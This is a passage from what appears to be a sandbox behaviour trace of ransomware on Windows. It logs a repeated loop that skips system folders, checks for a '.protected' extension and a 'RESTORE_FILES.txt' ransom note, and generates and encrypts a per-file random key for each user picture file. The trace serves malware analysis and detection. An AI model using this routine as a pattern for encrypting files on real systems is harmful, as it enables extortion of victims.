lpString2="Program Files") returned 1 [0071.497] lstrcmpiW (lpString1="usertile16.bmp", lpString2="Program Files (x86)") returned 1 [0071.497] lstrcmpiW (lpString1="usertile16.bmp", lpString2="$Recycle.bin") returned 1 [0071.497] lstrcmpiW (lpString1="usertile16.bmp", lpString2="System Volume Information") returned 1 [0071.497] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp") returned 82 [0071.497] StrStrIW (lpFirst="usertile16.bmp", lpSrch=".protected") returned 0x0 [0071.497] lstrcmpW (lpString1="usertile16.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.497] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.497] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.497] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.497] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.497] lstrcmpiW (lpString1="usertile17.bmp", lpString2="Windows") returned -1 [0071.497] lstrcmpiW (lpString1="usertile17.bmp", lpString2="Program Files") returned 1 [0071.497] lstrcmpiW (lpString1="usertile17.bmp", lpString2="Program Files (x86)") returned 1 [0071.497] lstrcmpiW (lpString1="usertile17.bmp", lpString2="$Recycle.bin") returned 1 [0071.497] lstrcmpiW (lpString1="usertile17.bmp", lpString2="System Volume Information") returned 1 [0071.497] wnsprintfW (in: 
pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp") returned 82 [0071.497] StrStrIW (lpFirst="usertile17.bmp", lpSrch=".protected") returned 0x0 [0071.497] lstrcmpW (lpString1="usertile17.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.498] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.498] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.498] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.498] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.498] lstrcmpiW (lpString1="usertile18.bmp", lpString2="Windows") returned -1 [0071.498] lstrcmpiW (lpString1="usertile18.bmp", lpString2="Program Files") returned 1 [0071.498] lstrcmpiW (lpString1="usertile18.bmp", lpString2="Program Files (x86)") returned 1 [0071.498] lstrcmpiW (lpString1="usertile18.bmp", lpString2="$Recycle.bin") returned 1 [0071.498] lstrcmpiW (lpString1="usertile18.bmp", lpString2="System Volume Information") returned 1 [0071.498] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp") returned 82 [0071.498] StrStrIW (lpFirst="usertile18.bmp", lpSrch=".protected") returned 0x0 [0071.498] lstrcmpW (lpString1="usertile18.bmp", lpString2="RESTORE_FILES.txt") returned 1 
[0071.498] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.498] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.498] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.505] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.505] lstrcmpiW (lpString1="usertile19.bmp", lpString2="Windows") returned -1 [0071.505] lstrcmpiW (lpString1="usertile19.bmp", lpString2="Program Files") returned 1 [0071.505] lstrcmpiW (lpString1="usertile19.bmp", lpString2="Program Files (x86)") returned 1 [0071.505] lstrcmpiW (lpString1="usertile19.bmp", lpString2="$Recycle.bin") returned 1 [0071.505] lstrcmpiW (lpString1="usertile19.bmp", lpString2="System Volume Information") returned 1 [0071.505] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp") returned 82 [0071.505] StrStrIW (lpFirst="usertile19.bmp", lpSrch=".protected") returned 0x0 [0071.505] lstrcmpW (lpString1="usertile19.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.505] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.505] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.505] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.505] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.505] lstrcmpiW (lpString1="usertile20.bmp", lpString2="Windows") returned -1 [0071.505] lstrcmpiW (lpString1="usertile20.bmp", lpString2="Program Files") returned 1 [0071.506] lstrcmpiW (lpString1="usertile20.bmp", lpString2="Program Files (x86)") returned 1 [0071.506] lstrcmpiW (lpString1="usertile20.bmp", lpString2="$Recycle.bin") returned 1 [0071.506] lstrcmpiW (lpString1="usertile20.bmp", lpString2="System Volume Information") returned 1 [0071.506] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp") returned 82 [0071.506] StrStrIW (lpFirst="usertile20.bmp", lpSrch=".protected") returned 0x0 [0071.506] lstrcmpW (lpString1="usertile20.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.506] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.506] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.507] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0071.507] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.507] lstrcmpiW (lpString1="usertile21.bmp", lpString2="Windows") returned -1 [0071.507] lstrcmpiW (lpString1="usertile21.bmp", lpString2="Program Files") returned 1 [0071.507] lstrcmpiW (lpString1="usertile21.bmp", lpString2="Program Files (x86)") returned 1 [0071.507] lstrcmpiW (lpString1="usertile21.bmp", lpString2="$Recycle.bin") returned 1 [0071.507] lstrcmpiW (lpString1="usertile21.bmp", lpString2="System Volume Information") returned 1 [0071.507] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp") returned 82 [0071.507] StrStrIW (lpFirst="usertile21.bmp", lpSrch=".protected") returned 0x0 [0071.507] lstrcmpW (lpString1="usertile21.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.507] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.507] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.507] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.507] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.507] lstrcmpiW (lpString1="usertile22.bmp", lpString2="Windows") returned -1 [0071.507] lstrcmpiW (lpString1="usertile22.bmp", lpString2="Program Files") returned 1 [0071.507] lstrcmpiW 
(lpString1="usertile22.bmp", lpString2="Program Files (x86)") returned 1 [0071.507] lstrcmpiW (lpString1="usertile22.bmp", lpString2="$Recycle.bin") returned 1 [0071.507] lstrcmpiW (lpString1="usertile22.bmp", lpString2="System Volume Information") returned 1 [0071.507] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp") returned 82 [0071.507] StrStrIW (lpFirst="usertile22.bmp", lpSrch=".protected") returned 0x0 [0071.507] lstrcmpW (lpString1="usertile22.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.507] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.507] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.508] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.513] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.513] lstrcmpiW (lpString1="usertile23.bmp", lpString2="Windows") returned -1 [0071.513] lstrcmpiW (lpString1="usertile23.bmp", lpString2="Program Files") returned 1 [0071.513] lstrcmpiW (lpString1="usertile23.bmp", lpString2="Program Files (x86)") returned 1 [0071.513] lstrcmpiW (lpString1="usertile23.bmp", lpString2="$Recycle.bin") returned 1 [0071.513] lstrcmpiW (lpString1="usertile23.bmp", lpString2="System Volume Information") returned 1 [0071.513] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp") returned 82 [0071.513] StrStrIW (lpFirst="usertile23.bmp", lpSrch=".protected") returned 0x0 [0071.513] lstrcmpW (lpString1="usertile23.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.513] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.514] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.514] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.514] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.514] lstrcmpiW (lpString1="usertile24.bmp", lpString2="Windows") returned -1 [0071.514] lstrcmpiW (lpString1="usertile24.bmp", lpString2="Program Files") returned 1 [0071.514] lstrcmpiW (lpString1="usertile24.bmp", lpString2="Program Files (x86)") returned 1 [0071.514] lstrcmpiW (lpString1="usertile24.bmp", lpString2="$Recycle.bin") returned 1 [0071.514] lstrcmpiW (lpString1="usertile24.bmp", lpString2="System Volume Information") returned 1 [0071.514] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp") returned 82 [0071.514] StrStrIW (lpFirst="usertile24.bmp", lpSrch=".protected") returned 0x0 [0071.514] lstrcmpW (lpString1="usertile24.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.514] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.514] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.514] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.514] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.514] lstrcmpiW (lpString1="usertile25.bmp", lpString2="Windows") returned -1 [0071.514] lstrcmpiW (lpString1="usertile25.bmp", lpString2="Program Files") returned 1 [0071.514] lstrcmpiW (lpString1="usertile25.bmp", lpString2="Program Files (x86)") returned 1 [0071.514] lstrcmpiW (lpString1="usertile25.bmp", lpString2="$Recycle.bin") returned 1 [0071.514] lstrcmpiW (lpString1="usertile25.bmp", lpString2="System Volume Information") returned 1 [0071.514] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp") returned 82 [0071.514] StrStrIW (lpFirst="usertile25.bmp", lpSrch=".protected") returned 0x0 [0071.514] lstrcmpW (lpString1="usertile25.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.514] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.514] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.514] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account 
Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.514] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.514] lstrcmpiW (lpString1="usertile26.bmp", lpString2="Windows") returned -1 [0071.514] lstrcmpiW (lpString1="usertile26.bmp", lpString2="Program Files") returned 1 [0071.514] lstrcmpiW (lpString1="usertile26.bmp", lpString2="Program Files (x86)") returned 1 [0071.514] lstrcmpiW (lpString1="usertile26.bmp", lpString2="$Recycle.bin") returned 1 [0071.514] lstrcmpiW (lpString1="usertile26.bmp", lpString2="System Volume Information") returned 1 [0071.514] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp") returned 82 [0071.514] StrStrIW (lpFirst="usertile26.bmp", lpSrch=".protected") returned 0x0 [0071.515] lstrcmpW (lpString1="usertile26.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.515] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.515] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.515] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.519] FindNextFileW (in: 
hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.519] lstrcmpiW (lpString1="usertile27.bmp", lpString2="Windows") returned -1 [0071.519] lstrcmpiW (lpString1="usertile27.bmp", lpString2="Program Files") returned 1 [0071.519] lstrcmpiW (lpString1="usertile27.bmp", lpString2="Program Files (x86)") returned 1 [0071.519] lstrcmpiW (lpString1="usertile27.bmp", lpString2="$Recycle.bin") returned 1 [0071.519] lstrcmpiW (lpString1="usertile27.bmp", lpString2="System Volume Information") returned 1 [0071.519] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp") returned 82 [0071.519] StrStrIW (lpFirst="usertile27.bmp", lpSrch=".protected") returned 0x0 [0071.519] lstrcmpW (lpString1="usertile27.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.519] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.519] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.519] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.519] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.519] lstrcmpiW (lpString1="usertile28.bmp", lpString2="Windows") returned -1 [0071.519] lstrcmpiW (lpString1="usertile28.bmp", lpString2="Program Files") returned 1 [0071.519] lstrcmpiW (lpString1="usertile28.bmp", lpString2="Program Files (x86)") 
returned 1 [0071.519] lstrcmpiW (lpString1="usertile28.bmp", lpString2="$Recycle.bin") returned 1 [0071.519] lstrcmpiW (lpString1="usertile28.bmp", lpString2="System Volume Information") returned 1 [0071.519] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp") returned 82 [0071.519] StrStrIW (lpFirst="usertile28.bmp", lpSrch=".protected") returned 0x0 [0071.519] lstrcmpW (lpString1="usertile28.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.519] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.520] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.520] lstrcmpiW (lpString1="usertile29.bmp", lpString2="Windows") returned -1 [0071.520] lstrcmpiW (lpString1="usertile29.bmp", lpString2="Program Files") returned 1 [0071.520] lstrcmpiW (lpString1="usertile29.bmp", lpString2="Program Files (x86)") returned 1 [0071.520] lstrcmpiW (lpString1="usertile29.bmp", lpString2="$Recycle.bin") returned 1 [0071.520] lstrcmpiW (lpString1="usertile29.bmp", lpString2="System Volume Information") returned 1 [0071.520] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account 
Pictures\\Default Pictures\\usertile29.bmp") returned 82 [0071.520] StrStrIW (lpFirst="usertile29.bmp", lpSrch=".protected") returned 0x0 [0071.520] lstrcmpW (lpString1="usertile29.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.520] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.520] lstrcmpiW (lpString1="usertile30.bmp", lpString2="Windows") returned -1 [0071.520] lstrcmpiW (lpString1="usertile30.bmp", lpString2="Program Files") returned 1 [0071.520] lstrcmpiW (lpString1="usertile30.bmp", lpString2="Program Files (x86)") returned 1 [0071.520] lstrcmpiW (lpString1="usertile30.bmp", lpString2="$Recycle.bin") returned 1 [0071.520] lstrcmpiW (lpString1="usertile30.bmp", lpString2="System Volume Information") returned 1 [0071.520] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp") returned 82 [0071.520] StrStrIW (lpFirst="usertile30.bmp", lpSrch=".protected") returned 0x0 [0071.520] lstrcmpW (lpString1="usertile30.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 
[0071.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.521] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.521] lstrcmpiW (lpString1="usertile31.bmp", lpString2="Windows") returned -1 [0071.521] lstrcmpiW (lpString1="usertile31.bmp", lpString2="Program Files") returned 1 [0071.521] lstrcmpiW (lpString1="usertile31.bmp", lpString2="Program Files (x86)") returned 1 [0071.521] lstrcmpiW (lpString1="usertile31.bmp", lpString2="$Recycle.bin") returned 1 [0071.521] lstrcmpiW (lpString1="usertile31.bmp", lpString2="System Volume Information") returned 1 [0071.521] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp") returned 82 [0071.521] StrStrIW (lpFirst="usertile31.bmp", lpSrch=".protected") returned 0x0 [0071.521] lstrcmpW (lpString1="usertile31.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.521] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.521] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: 
"c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.521] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.521] lstrcmpiW (lpString1="usertile32.bmp", lpString2="Windows") returned -1 [0071.521] lstrcmpiW (lpString1="usertile32.bmp", lpString2="Program Files") returned 1 [0071.522] lstrcmpiW (lpString1="usertile32.bmp", lpString2="Program Files (x86)") returned 1 [0071.522] lstrcmpiW (lpString1="usertile32.bmp", lpString2="$Recycle.bin") returned 1 [0071.522] lstrcmpiW (lpString1="usertile32.bmp", lpString2="System Volume Information") returned 1 [0071.522] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp") returned 82 [0071.522] StrStrIW 